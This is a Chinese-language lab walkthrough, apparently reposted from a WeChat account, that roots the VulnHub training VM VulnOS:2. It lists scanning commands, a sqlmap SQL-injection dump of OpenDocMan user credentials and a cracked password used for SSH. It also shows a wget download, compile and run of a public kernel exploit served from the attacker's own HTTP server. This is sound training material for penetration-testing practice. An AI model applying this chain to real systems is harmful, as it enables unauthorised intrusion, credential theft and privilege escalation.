OSCP难度靶机之VulnOS:2

admin 2022年4月24日13:12:20安全文章评论19 views1518字阅读5分3秒阅读模式

虚拟机信息:

虚拟机下载地址:

https://www.vulnhub.com/entry/vulnos-2,147/

虚拟机简介:你的任务是对公司网站进行渗透测试,获取系统的根目录并读取最终标志

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.1.0/24

OSCP难度靶机之VulnOS:2

2、服务探测

1、通过nmap进行端口扫描

 nmap -A -sS -sV -v -p- 192.168.1.5

查看开放20、80、6667端口

OSCP难度靶机之VulnOS:2

3、渗透测试

3.1 HTTP渗透

1.访问站点信息如下

访问80端口页面未发现有用信息

OSCP难度靶机之VulnOS:2

2.目录访问测试

dirb http://192.168.1.7

未发现有用信息

OSCP难度靶机之VulnOS:2

3.目录探测

nikto -host http://192.168.1.7

未发现有用信息

OSCP难度靶机之VulnOS:2

4.查看网页源代码

发现超链有/jabc

OSCP难度靶机之VulnOS:2

5.使用nikto进行探测

发现有安装页面

OSCP难度靶机之VulnOS:2

OSCP难度靶机之VulnOS:2

6.查看其他页面

在Documentation页面中,查看网页源代码,发现有一个超链,并提示guest账号登录

OSCP难度靶机之VulnOS:2

OSCP难度靶机之VulnOS:2

7.使用guest进行登录

OSCP难度靶机之VulnOS:2

OSCP难度靶机之VulnOS:2

8.查看系统版本信息

查看版本为:OpenDocMan v1.2.7

OSCP难度靶机之VulnOS:2

9.搜索应用漏洞

searchsploit OpenDocMan 1.2.7

OSCP难度靶机之VulnOS:2

cat /usr/share/exploitdb/exploits/php/webapps/32075.txt

注入类型为SQL注入

OSCP难度靶机之VulnOS:2

3.2 爆破数据

1.使用SQLmap进行测试

sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk=3 --level=5 --dbs --threads=4 --batch

OSCP难度靶机之VulnOS:2

2.爆破数据库

sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 --tables --batch

OSCP难度靶机之VulnOS:2

3.爆破列内容

sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 -T odm_user --batch --columns

OSCP难度靶机之VulnOS:2

4.爆破用户名和密码

sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 -T odm_user --batch -C 'username,password' --dump

OSCP难度靶机之VulnOS:2

5.解密webadmin

解密后获取密码为:webmin1980

OSCP难度靶机之VulnOS:2

3.3 主机渗透

1.尝试用户和密码登录SSH

ssh [email protected]

SSH登录成功

OSCP难度靶机之VulnOS:2

2.查看系统版本

lsb_release -a
uname -a

OSCP难度靶机之VulnOS:2

3.查找系统漏洞

searchsploit ubuntu 14.04 kernel 3.13

OSCP难度靶机之VulnOS:2

4.创建简单http服务

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
python -m http.server 8080

OSCP难度靶机之VulnOS:2

5.主机下载文件编译

wget http://192.168.1.6:8080/37292.c
gcc 37292.c -o ofs
./ofs

OSCP难度靶机之VulnOS:2

6.查看flag

cd /root
cat flag.txt

OSCP难度靶机之VulnOS:2

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之VulnOS:2

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月24日13:12:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之VulnOS:2 http://cn-sec.com/archives/937535.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: